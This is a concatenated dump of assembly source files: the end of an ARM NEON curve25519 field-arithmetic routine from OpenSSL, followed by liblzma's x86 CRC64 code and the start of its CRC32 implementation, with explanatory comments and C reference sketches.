vmul.i32 q7,q2,q0
vld1.8 {d8},[r6,: 64]
vext.32 d17,d11,d10,#1
vmul.i32 q9,q3,q0
vext.32 d16,d10,d8,#1
vshl.u32 q10,q5,q1
vext.32 d22,d14,d4,#1
vext.32 d24,d18,d6,#1
vshl.u32 q13,q6,q1
vshl.u32 d28,d8,d2
vrev64.i32 d22,d22
vmul.i32 d1,d9,d1
vrev64.i32 d24,d24
vext.32 d29,d8,d13,#1
vext.32 d0,d1,d9,#1
vrev64.i32 d0,d0
vext.32 d2,d9,d1,#1
vext.32 d23,d15,d5,#1
vmull.s32 q4,d20,d4
vrev64.i32 d23,d23
vmlal.s32 q4,d21,d1
vrev64.i32 d2,d2
vmlal.s32 q4,d26,d19
vext.32 d3,d5,d15,#1
vmlal.s32 q4,d27,d18
vrev64.i32 d3,d3
vmlal.s32 q4,d28,d15
vext.32 d14,d12,d11,#1
vmull.s32 q5,d16,d23
vext.32 d15,d13,d12,#1
vmlal.s32 q5,d17,d4
vst1.8 d8,[r7,: 64]!
vmlal.s32 q5,d14,d1
vext.32 d12,d9,d8,#0
vmlal.s32 q5,d15,d19
vmov.i64 d13,#0
vmlal.s32 q5,d29,d18
vext.32 d25,d19,d7,#1
vmlal.s32 q6,d20,d5
vrev64.i32 d25,d25
vmlal.s32 q6,d21,d4
vst1.8 d11,[r7,: 64]!
vmlal.s32 q6,d26,d1
vext.32 d9,d10,d10,#0
vmlal.s32 q6,d27,d19
vmov.i64 d8,#0
vmlal.s32 q6,d28,d18
vmlal.s32 q4,d16,d24
vmlal.s32 q4,d17,d5
vmlal.s32 q4,d14,d4
vst1.8 d12,[r7,: 64]!
vmlal.s32 q4,d15,d1
vext.32 d10,d13,d12,#0
vmlal.s32 q4,d29,d19
vmov.i64 d11,#0
vmlal.s32 q5,d20,d6
vmlal.s32 q5,d21,d5
vmlal.s32 q5,d26,d4
vext.32 d13,d8,d8,#0
vmlal.s32 q5,d27,d1
vmov.i64 d12,#0
vmlal.s32 q5,d28,d19
vst1.8 d9,[r7,: 64]!
vmlal.s32 q6,d16,d25
vmlal.s32 q6,d17,d6
vst1.8 d10,[r7,: 64]
vmlal.s32 q6,d14,d5
vext.32 d8,d11,d10,#0
vmlal.s32 q6,d15,d4
vmov.i64 d9,#0
vmlal.s32 q6,d29,d1
vmlal.s32 q4,d20,d7
vmlal.s32 q4,d21,d6
vmlal.s32 q4,d26,d5
vext.32 d11,d12,d12,#0
vmlal.s32 q4,d27,d4
vmov.i64 d10,#0
vmlal.s32 q4,d28,d1
vmlal.s32 q5,d16,d0
sub r6,r7,#32
vmlal.s32 q5,d17,d7
vmlal.s32 q5,d14,d6
vext.32 d30,d9,d8,#0
vmlal.s32 q5,d15,d5
vld1.8 {d31},[r6,: 64]!
vmlal.s32 q5,d29,d4
vmlal.s32 q15,d20,d0
vext.32 d0,d6,d18,#1
vmlal.s32 q15,d21,d25
vrev64.i32 d0,d0
vmlal.s32 q15,d26,d24
vext.32 d1,d7,d19,#1
vext.32 d7,d10,d10,#0
vmlal.s32 q15,d27,d23
vrev64.i32 d1,d1
vld1.8 {d6},[r6,: 64]
vmlal.s32 q15,d28,d22
vmlal.s32 q3,d16,d4
add r6,r6,#24
vmlal.s32 q3,d17,d2
vext.32 d4,d31,d30,#0
vmov d17,d11
vmlal.s32 q3,d14,d1
vext.32 d11,d13,d13,#0
vext.32 d13,d30,d30,#0
vmlal.s32 q3,d15,d0
vext.32 d1,d8,d8,#0
vmlal.s32 q3,d29,d3
vld1.8 {d5},[r6,: 64]
sub r6,r6,#16
vext.32 d10,d6,d6,#0
vmov.i32 q1,#0xffffffff
vshl.i64 q4,q1,#25
add r7,sp,#512
vld1.8 {d14-d15},[r7,: 128]
vadd.i64 q9,q2,q7
vshl.i64 q1,q1,#26
vshr.s64 q10,q9,#26
vld1.8 {d0},[r6,: 64]!
vadd.i64 q5,q5,q10
vand q9,q9,q1
vld1.8 {d16},[r6,: 64]!
add r6,sp,#528
vld1.8 {d20-d21},[r6,: 128]
vadd.i64 q11,q5,q10
vsub.i64 q2,q2,q9
vshr.s64 q9,q11,#25
vext.32 d12,d5,d4,#0
vand q11,q11,q4
vadd.i64 q0,q0,q9
vmov d19,d7
vadd.i64 q3,q0,q7
vsub.i64 q5,q5,q11
vshr.s64 q11,q3,#26
vext.32 d18,d11,d10,#0
vand q3,q3,q1
vadd.i64 q8,q8,q11
vadd.i64 q11,q8,q10
vsub.i64 q0,q0,q3
vshr.s64 q3,q11,#25
vand q11,q11,q4
vadd.i64 q3,q6,q3
vadd.i64 q6,q3,q7
vsub.i64 q8,q8,q11
vshr.s64 q11,q6,#26
vand q6,q6,q1
vadd.i64 q9,q9,q11
vadd.i64 d25,d19,d21
vsub.i64 q3,q3,q6
vshr.s64 d23,d25,#25
vand q4,q12,q4
vadd.i64 d21,d23,d23
vshl.i64 d25,d23,#4
vadd.i64 d21,d21,d23
vadd.i64 d25,d25,d21
vadd.i64 d4,d4,d25
vzip.i32 q0,q8
vadd.i64 d12,d4,d14
add r6,r8,#8
vst1.8 d0,[r6,: 64]
vsub.i64 d19,d19,d9
add r6,r6,#16
vst1.8 d16,[r6,: 64]
vshr.s64 d22,d12,#26
vand q0,q6,q1
vadd.i64 d10,d10,d22
vzip.i32 q3,q9
vsub.i64 d4,d4,d0
sub r6,r6,#8
vst1.8 d6,[r6,: 64]
add r6,r6,#16
vst1.8 d18,[r6,: 64]
vzip.i32 q2,q5
sub r6,r6,#32
vst1.8 d4,[r6,: 64]
subs r5,r5,#1
bhi ._squaringloop
._skipsquaringloop:
mov r2,r2
add r5,r3,#288
add r6,r3,#144
vmov.i32 q0,#19
vmov.i32 q1,#0
vmov.i32 q2,#1
vzip.i32 q1,q2
vld1.8 {d4-d5},[r5,: 128]!
vld1.8 {d6-d7},[r5,: 128]!
vld1.8 {d9},[r5,: 64]
vld1.8 {d10-d11},[r2,: 128]!
add r5,sp,#416
vld1.8 {d12-d13},[r2,: 128]!
vmul.i32 q7,q2,q0
vld1.8 {d8},[r2,: 64]
vext.32 d17,d11,d10,#1
vmul.i32 q9,q3,q0
vext.32 d16,d10,d8,#1
vshl.u32 q10,q5,q1
vext.32 d22,d14,d4,#1
vext.32 d24,d18,d6,#1
vshl.u32 q13,q6,q1
vshl.u32 d28,d8,d2
vrev64.i32 d22,d22
vmul.i32 d1,d9,d1
vrev64.i32 d24,d24
vext.32 d29,d8,d13,#1
vext.32 d0,d1,d9,#1
vrev64.i32 d0,d0
vext.32 d2,d9,d1,#1
vext.32 d23,d15,d5,#1
vmull.s32 q4,d20,d4
vrev64.i32 d23,d23
vmlal.s32 q4,d21,d1
vrev64.i32 d2,d2
vmlal.s32 q4,d26,d19
vext.32 d3,d5,d15,#1
vmlal.s32 q4,d27,d18
vrev64.i32 d3,d3
vmlal.s32 q4,d28,d15
vext.32 d14,d12,d11,#1
vmull.s32 q5,d16,d23
vext.32 d15,d13,d12,#1
vmlal.s32 q5,d17,d4
vst1.8 d8,[r5,: 64]!
vmlal.s32 q5,d14,d1
vext.32 d12,d9,d8,#0
vmlal.s32 q5,d15,d19
vmov.i64 d13,#0
vmlal.s32 q5,d29,d18
vext.32 d25,d19,d7,#1
vmlal.s32 q6,d20,d5
vrev64.i32 d25,d25
vmlal.s32 q6,d21,d4
vst1.8 d11,[r5,: 64]!
vmlal.s32 q6,d26,d1
vext.32 d9,d10,d10,#0
vmlal.s32 q6,d27,d19
vmov.i64 d8,#0
vmlal.s32 q6,d28,d18
vmlal.s32 q4,d16,d24
vmlal.s32 q4,d17,d5
vmlal.s32 q4,d14,d4
vst1.8 d12,[r5,: 64]!
vmlal.s32 q4,d15,d1
vext.32 d10,d13,d12,#0
vmlal.s32 q4,d29,d19
vmov.i64 d11,#0
vmlal.s32 q5,d20,d6
vmlal.s32 q5,d21,d5
vmlal.s32 q5,d26,d4
vext.32 d13,d8,d8,#0
vmlal.s32 q5,d27,d1
vmov.i64 d12,#0
vmlal.s32 q5,d28,d19
vst1.8 d9,[r5,: 64]!
vmlal.s32 q6,d16,d25
vmlal.s32 q6,d17,d6
vst1.8 d10,[r5,: 64]
vmlal.s32 q6,d14,d5
vext.32 d8,d11,d10,#0
vmlal.s32 q6,d15,d4
vmov.i64 d9,#0
vmlal.s32 q6,d29,d1
vmlal.s32 q4,d20,d7
vmlal.s32 q4,d21,d6
vmlal.s32 q4,d26,d5
vext.32 d11,d12,d12,#0
vmlal.s32 q4,d27,d4
vmov.i64 d10,#0
vmlal.s32 q4,d28,d1
vmlal.s32 q5,d16,d0
sub r2,r5,#32
vmlal.s32 q5,d17,d7
vmlal.s32 q5,d14,d6
vext.32 d30,d9,d8,#0
vmlal.s32 q5,d15,d5
vld1.8 {d31},[r2,: 64]!
vmlal.s32 q5,d29,d4
vmlal.s32 q15,d20,d0
vext.32 d0,d6,d18,#1
vmlal.s32 q15,d21,d25
vrev64.i32 d0,d0
vmlal.s32 q15,d26,d24
vext.32 d1,d7,d19,#1
vext.32 d7,d10,d10,#0
vmlal.s32 q15,d27,d23
vrev64.i32 d1,d1
vld1.8 {d6},[r2,: 64]
vmlal.s32 q15,d28,d22
vmlal.s32 q3,d16,d4
add r2,r2,#24
vmlal.s32 q3,d17,d2
vext.32 d4,d31,d30,#0
vmov d17,d11
vmlal.s32 q3,d14,d1
vext.32 d11,d13,d13,#0
vext.32 d13,d30,d30,#0
vmlal.s32 q3,d15,d0
vext.32 d1,d8,d8,#0
vmlal.s32 q3,d29,d3
vld1.8 {d5},[r2,: 64]
sub r2,r2,#16
vext.32 d10,d6,d6,#0
vmov.i32 q1,#0xffffffff
vshl.i64 q4,q1,#25
add r5,sp,#512
vld1.8 {d14-d15},[r5,: 128]
vadd.i64 q9,q2,q7
vshl.i64 q1,q1,#26
vshr.s64 q10,q9,#26
vld1.8 {d0},[r2,: 64]!
vadd.i64 q5,q5,q10
vand q9,q9,q1
vld1.8 {d16},[r2,: 64]!
add r2,sp,#528
vld1.8 {d20-d21},[r2,: 128]
vadd.i64 q11,q5,q10
vsub.i64 q2,q2,q9
vshr.s64 q9,q11,#25
vext.32 d12,d5,d4,#0
vand q11,q11,q4
vadd.i64 q0,q0,q9
vmov d19,d7
vadd.i64 q3,q0,q7
vsub.i64 q5,q5,q11
vshr.s64 q11,q3,#26
vext.32 d18,d11,d10,#0
vand q3,q3,q1
vadd.i64 q8,q8,q11
vadd.i64 q11,q8,q10
vsub.i64 q0,q0,q3
vshr.s64 q3,q11,#25
vand q11,q11,q4
vadd.i64 q3,q6,q3
vadd.i64 q6,q3,q7
vsub.i64 q8,q8,q11
vshr.s64 q11,q6,#26
vand q6,q6,q1
vadd.i64 q9,q9,q11
vadd.i64 d25,d19,d21
vsub.i64 q3,q3,q6
vshr.s64 d23,d25,#25
vand q4,q12,q4
vadd.i64 d21,d23,d23
vshl.i64 d25,d23,#4
vadd.i64 d21,d21,d23
vadd.i64 d25,d25,d21
vadd.i64 d4,d4,d25
vzip.i32 q0,q8
vadd.i64 d12,d4,d14
add r2,r6,#8
vst1.8 d0,[r2,: 64]
vsub.i64 d19,d19,d9
add r2,r2,#16
vst1.8 d16,[r2,: 64]
vshr.s64 d22,d12,#26
vand q0,q6,q1
vadd.i64 d10,d10,d22
vzip.i32 q3,q9
vsub.i64 d4,d4,d0
sub r2,r2,#8
vst1.8 d6,[r2,: 64]
add r2,r2,#16
vst1.8 d18,[r2,: 64]
vzip.i32 q2,q5
sub r2,r2,#32
vst1.8 d4,[r2,: 64]
cmp r4,#0
beq ._skippostcopy
add r2,r3,#144
mov r4,r4
vld1.8 {d0-d1},[r2,: 128]!
vld1.8 {d2-d3},[r2,: 128]!
vld1.8 {d4},[r2,: 64]
vst1.8 {d0-d1},[r4,: 128]!
vst1.8 {d2-d3},[r4,: 128]!
vst1.8 d4,[r4,: 64]
._skippostcopy:
cmp r1,#1
bne ._skipfinalcopy
add r2,r3,#288
add r4,r3,#144
vld1.8 {d0-d1},[r2,: 128]!
vld1.8 {d2-d3},[r2,: 128]!
vld1.8 {d4},[r2,: 64]
vst1.8 {d0-d1},[r4,: 128]!
vst1.8 {d2-d3},[r4,: 128]!
vst1.8 d4,[r4,: 64]
._skipfinalcopy:
add r1,r1,#1
cmp r1,#12
blo ._invertloop
add r1,r3,#144
ldr r2,[r1],#4
ldr r3,[r1],#4
ldr r4,[r1],#4
ldr r5,[r1],#4
ldr r6,[r1],#4
ldr r7,[r1],#4
ldr r8,[r1],#4
ldr r9,[r1],#4
ldr r10,[r1],#4
ldr r1,[r1]
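/* Note: the scalar code below appears to perform the final reduction
 * modulo 2^255-19: a trial carry chain computes the carry out of the
 * top limb, that carry is multiplied by 19 (r1 + 16*r1 + 2*r1) and
 * folded into the bottom limb, the ten 25/26-bit limbs are then
 * normalized, and finally repacked into eight 32-bit output words. */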
add r11,r1,r1,LSL #4
add r11,r11,r1,LSL #1
add r11,r11,#16777216
mov r11,r11,ASR #25
add r11,r11,r2
mov r11,r11,ASR #26
add r11,r11,r3
mov r11,r11,ASR #25
add r11,r11,r4
mov r11,r11,ASR #26
add r11,r11,r5
mov r11,r11,ASR #25
add r11,r11,r6
mov r11,r11,ASR #26
add r11,r11,r7
mov r11,r11,ASR #25
add r11,r11,r8
mov r11,r11,ASR #26
add r11,r11,r9
mov r11,r11,ASR #25
add r11,r11,r10
mov r11,r11,ASR #26
add r11,r11,r1
mov r11,r11,ASR #25
add r2,r2,r11
add r2,r2,r11,LSL #1
add r2,r2,r11,LSL #4
mov r11,r2,ASR #26
add r3,r3,r11
sub r2,r2,r11,LSL #26
mov r11,r3,ASR #25
add r4,r4,r11
sub r3,r3,r11,LSL #25
mov r11,r4,ASR #26
add r5,r5,r11
sub r4,r4,r11,LSL #26
mov r11,r5,ASR #25
add r6,r6,r11
sub r5,r5,r11,LSL #25
mov r11,r6,ASR #26
add r7,r7,r11
sub r6,r6,r11,LSL #26
mov r11,r7,ASR #25
add r8,r8,r11
sub r7,r7,r11,LSL #25
mov r11,r8,ASR #26
add r9,r9,r11
sub r8,r8,r11,LSL #26
mov r11,r9,ASR #25
add r10,r10,r11
sub r9,r9,r11,LSL #25
mov r11,r10,ASR #26
add r1,r1,r11
sub r10,r10,r11,LSL #26
mov r11,r1,ASR #25
sub r1,r1,r11,LSL #25
add r2,r2,r3,LSL #26
mov r3,r3,LSR #6
add r3,r3,r4,LSL #19
mov r4,r4,LSR #13
add r4,r4,r5,LSL #13
mov r5,r5,LSR #19
add r5,r5,r6,LSL #6
add r6,r7,r8,LSL #25
mov r7,r8,LSR #7
add r7,r7,r9,LSL #19
mov r8,r9,LSR #13
add r8,r8,r10,LSL #12
mov r9,r10,LSR #20
add r1,r9,r1,LSL #6
str r2,[r0],#4
str r3,[r0],#4
str r4,[r0],#4
str r5,[r0],#4
str r6,[r0],#4
str r7,[r0],#4
str r8,[r0],#4
str r1,[r0]
ldrd r4,[sp,#0]
ldrd r6,[sp,#8]
ldrd r8,[sp,#16]
ldrd r10,[sp,#24]
ldr r12,[sp,#480]
ldr r14,[sp,#484]
ldr r0,=0
mov sp,r12
vpop {q4,q5,q6,q7}
bx lr
#endif /* !OPENSSL_NO_ASM && OPENSSL_ARM && __ELF__ */
|
mi2bjss/Pressel-site | 6,761 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/lzma-sys-0.1.20/xz-5.2/src/liblzma/check/crc64_x86.S | /*
* Speed-optimized CRC64 using slicing-by-four algorithm
*
* This uses only i386 instructions, but it is optimized for i686 and later
* (including e.g. Pentium II/III/IV, Athlon XP, and Core 2).
*
* Authors: Igor Pavlov (original CRC32 assembly code)
* Lasse Collin (CRC64 adaptation of the modified CRC32 code)
*
* This file has been put into the public domain.
* You can do whatever you want with this file.
*
* This code needs lzma_crc64_table, which can be created using the
* following C code:
uint64_t lzma_crc64_table[4][256];

void
init_table(void)
{
	// ECMA-182
	static const uint64_t poly64 = UINT64_C(0xC96C5795D7870F42);

	for (size_t s = 0; s < 4; ++s) {
		for (size_t b = 0; b < 256; ++b) {
			uint64_t r = s == 0 ? b : lzma_crc64_table[s - 1][b];
			for (size_t i = 0; i < 8; ++i) {
				if (r & 1)
					r = (r >> 1) ^ poly64;
				else
					r >>= 1;
			}
			lzma_crc64_table[s][b] = r;
		}
	}
}
* The prototype of the CRC64 function:
* extern uint64_t lzma_crc64(const uint8_t *buf, size_t size, uint64_t crc);
*/
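/*
 * Note: a minimal usage sketch in C, assuming the table above has been
 * initialized; crc64_of_buffer is an illustrative helper name, not part
 * of liblzma. The crc argument carries state, so data can also be
 * processed in chunks by passing each return value back in:
 *
 *	uint64_t
 *	crc64_of_buffer(const uint8_t *buf, size_t size)
 *	{
 *		// Start from zero; the function complements the value
 *		// internally on entry and again before returning.
 *		return lzma_crc64(buf, size, 0);
 *	}
 */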
/*
* On some systems, the functions need to be prefixed. The prefix is
* usually an underscore.
*/
#ifndef __USER_LABEL_PREFIX__
# define __USER_LABEL_PREFIX__
#endif
#define MAKE_SYM_CAT(prefix, sym) prefix ## sym
#define MAKE_SYM(prefix, sym) MAKE_SYM_CAT(prefix, sym)
#define LZMA_CRC64 MAKE_SYM(__USER_LABEL_PREFIX__, lzma_crc64)
#define LZMA_CRC64_TABLE MAKE_SYM(__USER_LABEL_PREFIX__, lzma_crc64_table)
/*
* Solaris assembler doesn't have .p2align, and Darwin uses .align
* differently than GNU/Linux and Solaris.
*/
#if defined(__APPLE__) || defined(__MSDOS__)
# define ALIGN(pow2, abs) .align pow2
#else
# define ALIGN(pow2, abs) .align abs
#endif
.text
.globl LZMA_CRC64
#if !defined(__APPLE__) && !defined(_WIN32) && !defined(__CYGWIN__) \
&& !defined(__MSDOS__)
.type LZMA_CRC64, @function
#endif
ALIGN(4, 16)
LZMA_CRC64:
/*
* Register usage:
* %eax crc LSB
* %edx crc MSB
* %esi buf
* %edi size or buf + size
* %ebx lzma_crc64_table
* %ebp Table index
* %ecx Temporary
*/
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl 0x14(%esp), %esi /* buf */
movl 0x18(%esp), %edi /* size */
movl 0x1C(%esp), %eax /* crc LSB */
movl 0x20(%esp), %edx /* crc MSB */
/*
* Store the address of lzma_crc64_table to %ebx. This is needed to
* get position-independent code (PIC).
*
* The PIC macro is defined by libtool, while __PIC__ is defined
* by GCC but only on some systems. Testing for both makes it simpler
* to test this code without libtool, and keeps the code working also
* when built with libtool but using something else than GCC.
*
* I understood that libtool may define PIC on Windows even though
* the code in Windows DLLs is not PIC in the sense that it is in ELF
* binaries, so we need a separate check to always use the non-PIC
* code on Windows.
*/
#if (!defined(PIC) && !defined(__PIC__)) \
|| (defined(_WIN32) || defined(__CYGWIN__))
/* Not PIC */
movl $ LZMA_CRC64_TABLE, %ebx
#elif defined(__APPLE__)
/* Mach-O */
call .L_get_pc
.L_pic:
leal .L_lzma_crc64_table$non_lazy_ptr-.L_pic(%ebx), %ebx
movl (%ebx), %ebx
#else
/* ELF */
call .L_get_pc
addl $_GLOBAL_OFFSET_TABLE_, %ebx
movl LZMA_CRC64_TABLE@GOT(%ebx), %ebx
#endif
/* Complement the initial value. */
notl %eax
notl %edx
.L_align:
/*
* Check if there is enough input to use slicing-by-four.
* We need eight bytes, because the loop pre-reads four bytes.
*/
cmpl $8, %edi
jb .L_rest
/* Check if we have reached alignment of four bytes. */
testl $3, %esi
jz .L_slice
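/*
 * Note: the 64-bit CRC value lives in the %edx:%eax register pair, so
 * the shrdl/shrl pair below shifts it right by eight bits as a single
 * 64-bit quantity before the table entries are XORed in.
 */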
/* Calculate CRC of the next input byte. */
movzbl (%esi), %ebp
incl %esi
movzbl %al, %ecx
xorl %ecx, %ebp
shrdl $8, %edx, %eax
xorl (%ebx, %ebp, 8), %eax
shrl $8, %edx
xorl 4(%ebx, %ebp, 8), %edx
decl %edi
jmp .L_align
.L_slice:
/*
* If we get here, there's at least eight bytes of aligned input
* available. Make %edi multiple of four bytes. Store the possible
* remainder over the "size" variable in the argument stack.
*/
movl %edi, 0x18(%esp)
andl $-4, %edi
subl %edi, 0x18(%esp)
/*
* Let %edi be buf + size - 4 while running the main loop. This way
* we can compare for equality to determine when to exit the loop.
*/
addl %esi, %edi
subl $4, %edi
/* Read in the first four aligned bytes. */
movl (%esi), %ecx
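/*
 * Note: a rough C equivalent of one iteration of .L_loop, under the
 * assumption of a little-endian load; read32le and the variable names
 * are illustrative only:
 *
 *	uint32_t w = read32le(buf) ^ (uint32_t)crc;
 *	buf += 4;
 *	crc = (crc >> 32)
 *			^ lzma_crc64_table[3][w & 0xFF]
 *			^ lzma_crc64_table[2][(w >> 8) & 0xFF]
 *			^ lzma_crc64_table[1][(w >> 16) & 0xFF]
 *			^ lzma_crc64_table[0][w >> 24];
 *
 * The 0x1800/0x1000/0x0800 displacements in the assembly select the
 * four 256-entry sub-tables (each entry is eight bytes).
 */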
.L_loop:
xorl %eax, %ecx
movzbl %cl, %ebp
movl 0x1800(%ebx, %ebp, 8), %eax
xorl %edx, %eax
movl 0x1804(%ebx, %ebp, 8), %edx
movzbl %ch, %ebp
xorl 0x1000(%ebx, %ebp, 8), %eax
xorl 0x1004(%ebx, %ebp, 8), %edx
shrl $16, %ecx
movzbl %cl, %ebp
xorl 0x0800(%ebx, %ebp, 8), %eax
xorl 0x0804(%ebx, %ebp, 8), %edx
movzbl %ch, %ebp
addl $4, %esi
xorl (%ebx, %ebp, 8), %eax
xorl 4(%ebx, %ebp, 8), %edx
/* Check for end of aligned input. */
cmpl %edi, %esi
/*
* Copy the next four input bytes to %ecx. It is slightly faster to
* read them here than at the top of the loop.
*/
movl (%esi), %ecx
jb .L_loop
/*
* Process the remaining four bytes, which we have already
* copied to %ecx.
*/
xorl %eax, %ecx
movzbl %cl, %ebp
movl 0x1800(%ebx, %ebp, 8), %eax
xorl %edx, %eax
movl 0x1804(%ebx, %ebp, 8), %edx
movzbl %ch, %ebp
xorl 0x1000(%ebx, %ebp, 8), %eax
xorl 0x1004(%ebx, %ebp, 8), %edx
shrl $16, %ecx
movzbl %cl, %ebp
xorl 0x0800(%ebx, %ebp, 8), %eax
xorl 0x0804(%ebx, %ebp, 8), %edx
movzbl %ch, %ebp
addl $4, %esi
xorl (%ebx, %ebp, 8), %eax
xorl 4(%ebx, %ebp, 8), %edx
/* Copy the number of remaining bytes to %edi. */
movl 0x18(%esp), %edi
.L_rest:
/* Check for end of input. */
testl %edi, %edi
jz .L_return
/* Calculate CRC of the next input byte. */
movzbl (%esi), %ebp
incl %esi
movzbl %al, %ecx
xorl %ecx, %ebp
shrdl $8, %edx, %eax
xorl (%ebx, %ebp, 8), %eax
shrl $8, %edx
xorl 4(%ebx, %ebp, 8), %edx
decl %edi
jmp .L_rest
.L_return:
/* Complement the final value. */
notl %eax
notl %edx
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
#if defined(PIC) || defined(__PIC__)
ALIGN(4, 16)
.L_get_pc:
movl (%esp), %ebx
ret
#endif
#if defined(__APPLE__) && (defined(PIC) || defined(__PIC__))
/* Mach-O PIC */
.section __IMPORT,__pointers,non_lazy_symbol_pointers
.L_lzma_crc64_table$non_lazy_ptr:
.indirect_symbol LZMA_CRC64_TABLE
.long 0
#elif defined(_WIN32) || defined(__CYGWIN__)
# ifdef DLL_EXPORT
/* This is equivalent of __declspec(dllexport). */
.section .drectve
.ascii " -export:lzma_crc64"
# endif
#elif !defined(__MSDOS__)
/* ELF */
.size LZMA_CRC64, .-LZMA_CRC64
#endif
/*
* This is needed to support non-executable stack. It's ugly to
* use __linux__ here, but I don't know a way to detect when
* we are using GNU assembler.
*/
#if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",@progbits
#endif
|
mi2bjss/Pressel-site | 7,228 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/lzma-sys-0.1.20/xz-5.2/src/liblzma/check/crc32_x86.S | /*
* Speed-optimized CRC32 using slicing-by-eight algorithm
*
* This uses only i386 instructions, but it is optimized for i686 and later
* (including e.g. Pentium II/III/IV, Athlon XP, and Core 2). For i586
* (e.g. Pentium), slicing-by-four would be better, and even the C version
* of slicing-by-eight built with gcc -march=i586 tends to be a little bit
* better than this. Very few probably run this code on i586 or older x86,
* so this shouldn't be a problem in practice.
*
* Authors: Igor Pavlov (original version)
* Lasse Collin (AT&T syntax, PIC support, better portability)
*
* This file has been put into the public domain.
* You can do whatever you want with this file.
*
* This code needs lzma_crc32_table, which can be created using the
* following C code:
uint32_t lzma_crc32_table[8][256];
void
init_table(void)
{
// IEEE-802.3
static const uint32_t poly32 = UINT32_C(0xEDB88320);
// Castagnoli
// static const uint32_t poly32 = UINT32_C(0x82F63B78);
// Koopman
// static const uint32_t poly32 = UINT32_C(0xEB31D82E);
for (size_t s = 0; s < 8; ++s) {
for (size_t b = 0; b < 256; ++b) {
uint32_t r = s == 0 ? b : lzma_crc32_table[s - 1][b];
for (size_t i = 0; i < 8; ++i) {
if (r & 1)
r = (r >> 1) ^ poly32;
else
r >>= 1;
}
lzma_crc32_table[s][b] = r;
}
}
}
* The prototype of the CRC32 function:
* extern uint32_t lzma_crc32(const uint8_t *buf, size_t size, uint32_t crc);
*/
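/*
 * For reference, the aligned main loop below corresponds roughly to the
 * following C sketch of slicing-by-eight (assuming <stdint.h>, the
 * lzma_crc32_table layout generated above, and unaligned-safe
 * little-endian 32-bit loads). The helper name crc32_slice8_ref is made
 * up for illustration; this is not the source the assembly was written
 * from.
 uint32_t
 crc32_slice8_ref(const uint8_t *buf, size_t size, uint32_t crc)
 {
 crc = ~crc;
 // Advance byte by byte until buf is aligned to eight bytes.
 while (size != 0 && ((uintptr_t)buf & 7) != 0) {
 crc = lzma_crc32_table[0][(crc ^ *buf++) & 0xFF] ^ (crc >> 8);
 --size;
 }
 // Consume eight bytes per iteration with eight table lookups;
 // the earliest byte in memory uses the highest table index.
 while (size >= 8) {
 const uint32_t lo = crc ^ *(const uint32_t *)buf;
 const uint32_t hi = *(const uint32_t *)(buf + 4);
 crc = lzma_crc32_table[7][lo & 0xFF]
 ^ lzma_crc32_table[6][(lo >> 8) & 0xFF]
 ^ lzma_crc32_table[5][(lo >> 16) & 0xFF]
 ^ lzma_crc32_table[4][lo >> 24]
 ^ lzma_crc32_table[3][hi & 0xFF]
 ^ lzma_crc32_table[2][(hi >> 8) & 0xFF]
 ^ lzma_crc32_table[1][(hi >> 16) & 0xFF]
 ^ lzma_crc32_table[0][hi >> 24];
 buf += 8;
 size -= 8;
 }
 // Handle any remaining tail bytes one at a time.
 while (size-- != 0)
 crc = lzma_crc32_table[0][(crc ^ *buf++) & 0xFF] ^ (crc >> 8);
 return ~crc;
 }
 */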
/*
* On some systems, the functions need to be prefixed. The prefix is
* usually an underscore.
*/
#ifndef __USER_LABEL_PREFIX__
# define __USER_LABEL_PREFIX__
#endif
#define MAKE_SYM_CAT(prefix, sym) prefix ## sym
#define MAKE_SYM(prefix, sym) MAKE_SYM_CAT(prefix, sym)
#define LZMA_CRC32 MAKE_SYM(__USER_LABEL_PREFIX__, lzma_crc32)
#define LZMA_CRC32_TABLE MAKE_SYM(__USER_LABEL_PREFIX__, lzma_crc32_table)
/*
* Solaris assembler doesn't have .p2align, and Darwin uses .align
* differently than GNU/Linux and Solaris.
*/
#if defined(__APPLE__) || defined(__MSDOS__)
# define ALIGN(pow2, abs) .align pow2
#else
# define ALIGN(pow2, abs) .align abs
#endif
.text
.globl LZMA_CRC32
#if !defined(__APPLE__) && !defined(_WIN32) && !defined(__CYGWIN__) \
&& !defined(__MSDOS__)
.type LZMA_CRC32, @function
#endif
ALIGN(4, 16)
LZMA_CRC32:
/*
* Register usage:
* %eax crc
* %esi buf
* %edi size or buf + size
* %ebx lzma_crc32_table
* %ebp Table index
* %ecx Temporary
* %edx Temporary
*/
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl 0x14(%esp), %esi /* buf */
movl 0x18(%esp), %edi /* size */
movl 0x1C(%esp), %eax /* crc */
/*
* Store the address of lzma_crc32_table to %ebx. This is needed to
* get position-independent code (PIC).
*
* The PIC macro is defined by libtool, while __PIC__ is defined
* by GCC but only on some systems. Testing for both makes it simpler
* to test this code without libtool, and keeps the code working also
* when built with libtool but using something else than GCC.
*
* My understanding is that libtool may define PIC on Windows even though
* the code in Windows DLLs is not PIC in the sense that it is in ELF
* binaries, so we need a separate check to always use the non-PIC
* code on Windows.
*/
#if (!defined(PIC) && !defined(__PIC__)) \
|| (defined(_WIN32) || defined(__CYGWIN__))
/* Not PIC */
movl $ LZMA_CRC32_TABLE, %ebx
#elif defined(__APPLE__)
/* Mach-O */
call .L_get_pc
.L_pic:
leal .L_lzma_crc32_table$non_lazy_ptr-.L_pic(%ebx), %ebx
movl (%ebx), %ebx
#else
/* ELF */
call .L_get_pc
addl $_GLOBAL_OFFSET_TABLE_, %ebx
movl LZMA_CRC32_TABLE@GOT(%ebx), %ebx
#endif
/* Complement the initial value. */
notl %eax
ALIGN(4, 16)
.L_align:
/*
* Check if there is enough input to use slicing-by-eight.
* We need 16 bytes, because the loop pre-reads eight bytes.
*/
cmpl $16, %edi
jb .L_rest
/* Check if we have reached alignment of eight bytes. */
testl $7, %esi
jz .L_slice
/* Calculate CRC of the next input byte. */
movzbl (%esi), %ebp
incl %esi
movzbl %al, %ecx
xorl %ecx, %ebp
shrl $8, %eax
xorl (%ebx, %ebp, 4), %eax
decl %edi
jmp .L_align
ALIGN(2, 4)
.L_slice:
/*
* If we get here, there are at least 16 bytes of aligned input
* available. Make %edi multiple of eight bytes. Store the possible
* remainder over the "size" variable in the argument stack.
*/
movl %edi, 0x18(%esp)
andl $-8, %edi
subl %edi, 0x18(%esp)
/*
* Let %edi be buf + size - 8 while running the main loop. This way
